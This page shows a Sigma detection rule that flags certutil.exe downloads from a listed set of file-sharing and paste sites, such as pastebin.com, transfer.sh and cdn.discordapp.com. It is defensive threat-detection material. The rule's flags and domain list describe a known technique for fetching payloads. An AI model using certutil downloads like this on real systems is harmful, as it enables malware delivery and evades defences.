Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.

Sigma rule (View on GitHub)

  1title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
  2id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794
  3related:
  4    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
  5      type: similar
  6    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download
  7      type: similar
  8    - id: 8b48ad89-10d8-4382-a546-50588c410f0d
  9      type: similar
 10    - id: d635249d-86b5-4dad-a8c7-d7272b788586
 11      type: similar
 12    - id: 52182dfb-afb7-41db-b4bc-5336cb29b464
 13      type: similar
 14    - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
 15      type: similar
 16    - id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
 17      type: similar
 18    - id: 7b434893-c57d-4f41-908d-6a17bf1ae98f
 19      type: similar
 20    - id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c
 21      type: similar
 22    - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
 23      type: similar
 24    - id: b6e04788-29e1-4557-bb14-77f761848ab8
 25      type: similar
 26    - id: a0d7e4d2-bede-4141-8896-bc6e237e977c
 27      type: similar
 28    - id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7
 29      type: similar
 30status: test
 31description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
 32references:
 33    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
 34    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
 35    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
 36    - https://twitter.com/egre55/status/1087685529016193025
 37    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
 38    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
 39    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
 40author: Nasreddine Bencherchali (Nextron Systems)
 41date: 2023-02-15
 42modified: 2026-03-29
 43tags:
 44    - attack.stealth
 45    - attack.t1027
 46    - attack.command-and-control
 47    - attack.t1105
 48logsource:
 49    category: process_creation
 50    product: windows
 51detection:
 52    selection_img:
 53        - Image|endswith: '\certutil.exe'
 54        - OriginalFileName: 'CertUtil.exe'
 55    selection_flags:
 56        CommandLine|contains:
 57            - 'urlcache '
 58            - 'verifyctl '
 59            - 'URL '
 60    selection_http:
 61        CommandLine|contains:
 62            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)
 63            - '0x0.st'
 64            - 'anonfiles.com'
 65            - 'bashupload.com'
 66            - 'cdn.discordapp.com'
 67            - 'chunk.io'
 68            - 'ddns.net'
 69            - 'dl.dropboxusercontent.com'
 70            - 'ghostbin.co'
 71            - 'github.com'
 72            - 'glitch.me'
 73            - 'gofile.io'
 74            - 'hastebin.com'
 75            - 'mediafire.com'
 76            - 'mega.nz'
 77            - 'onrender.com'
 78            - 'pages.dev'
 79            - 'paste.ee'
 80            - 'pastebin.com'
 81            - 'pastebin.pl'
 82            - 'pastetext.net'
 83            - 'privatlab.com'
 84            - 'privatlab.net'
 85            - 'send.exploit.in'
 86            - 'sendspace.com'
 87            - 'storage.googleapis.com'
 88            - 'storjshare.io'
 89            - 'supabase.co'
 90            - 'temp.sh'
 91            - 'transfer.sh'
 92            - 'trycloudflare.com'
 93            - 'ufile.io'
 94            - 'w3spaces.com'
 95            - 'workers.dev'
 96            - 'x0.at'
 97    condition: all of selection_*
 98falsepositives:
 99    - Unknown
100level: high
101regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml

References

Related rules

to-top